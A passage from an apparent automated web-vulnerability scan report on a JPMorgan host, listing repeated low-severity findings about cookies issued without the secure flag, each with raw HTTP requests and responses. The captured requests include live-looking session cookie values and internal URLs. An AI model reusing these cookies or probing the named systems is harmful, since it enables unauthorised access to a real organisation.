Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/JPM_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/JPM_logo.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"1863-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 1863
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89aa......='.@+ Q<2_J@........y...P;1}j`............J5+F1'...;%.?).T?5[G=...r^T...@+!O:1...p\R...cOE.wnZE;C.$...B-"I4*q^T...=(.R=3WB9........VA7<&.dPFU@6.qh......<'.jVL..{S>5nZPye[{h_.yq;%.......B
...[SNIP]...

7.68. https://mm.jpmorgan.com/images/Morgan_Markets_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/Morgan_Markets_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/Morgan_Markets_logo.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"2594-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 2594
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..........rsvwx{qrupqtops.........xy|..................nor..........................................z{~...stwuvx........................vwz...|}...............................................
...[SNIP]...

7.69. https://mm.jpmorgan.com/images/backgrounds/btn_hover_center_bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/backgrounds/btn_hover_center_bg.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/backgrounds/btn_hover_center_bg.png HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:26 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"177-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=3600
Expires: Tue, 12 Jul 2011 17:30:26 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 177
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/png

.PNG
.
...IHDR..............}2.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<.../IDAT.Wc..-....D.;...n.e......2w.+...N.J0.........%#e......IEND.B`.

7.70. https://mm.jpmorgan.com/images/btn_center_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_center_bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_center_bg.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"138-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 138
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................................................................,........... d...<H.D. (...;

7.71. https://mm.jpmorgan.com/images/btn_hover_center_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_hover_center_bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_hover_center_bg.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:25 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"87-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:25 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 87
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........?..[..N..G.....G..a.....f..U.f................,...........P.dB.....*J..;

7.72. https://mm.jpmorgan.com/images/btn_hover_left_side.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_hover_left_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_hover_left_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:25 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"170-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:25 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 170
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........q..[..J..?.....L..v..b..W..N.....{.....p........}..G.. ..U..X..j..+.q......G.f................!.......,..........'.vi..i
.9.F..2iF.5.VZ.h..P.....ERB.4!.;

7.73. https://mm.jpmorgan.com/images/btn_hover_right_side.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_hover_right_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_hover_right_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:26 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"170-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:26 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 170
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........q..[..J..?.....L..v..b..W..N.....{.....p........}..G.. ..U..X..j..+.q......G.f................!.......,..........'.vm.u..v8Z@h..%..5.PiL.a._.(,>..    E.0.6!.;

7.74. https://mm.jpmorgan.com/images/btn_left_side.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_left_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_left_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"175-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 175
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................................................................!.......,..........,..i.T!..U.FY.1h..I..$Z.h..P......Bc1h
..E.    ..;

7.75. https://mm.jpmorgan.com/images/btn_right_side.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/btn_right_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_right_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"174-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 174
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................................................................!.......,..........+..m..Q."U.Ei..A..HZ.hN.]._....|
..`.<
-.h...;

7.76. https://mm.jpmorgan.com/images/icons/attention.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/icons/attention.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/attention.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:27 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"709-1310119382000"
Last-Modified: Fri, 08 Jul 2011 10:03:02 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:27 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 709
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.....v..c..\..Q....._..X..m..b..[...D........E..G..H.U..i..q..[...............v.~4..=..J.....z........Z..3..7.......~4.....9.t".~1.f..J...A....}+.z$..............K._......_....m.....e.....n..m..
...[SNIP]...

7.77. https://mm.jpmorgan.com/images/menu_bg_img.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /images/menu_bg_img.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menu_bg_img.jpg HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"4057-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 4057
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................@....
...[SNIP]...

7.78. https://mm.jpmorgan.com/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.jsp?pageName=country_earea HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.4.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA

Response

HTTP/1.1 302 Found
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:21 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Location: https://iblogin.jpmorgan.com/sso/action/federateLogin?URI=https%3a%2f%2fmm.jpmorgan.com%3a443%2findex.jsp%3fpageName%3dcountry_earea&msg=+&securityLevel=0&cs=67%2bwndJznEzJNkT9QmX2jX9JYMs%3d
Vary: Accept-Encoding
Content-Length: 386
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://iblogin.jpmorgan.com/sso/action/federat
...[SNIP]...

7.79. https://mm.jpmorgan.com/js/dropdowns.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/dropdowns.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/dropdowns.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
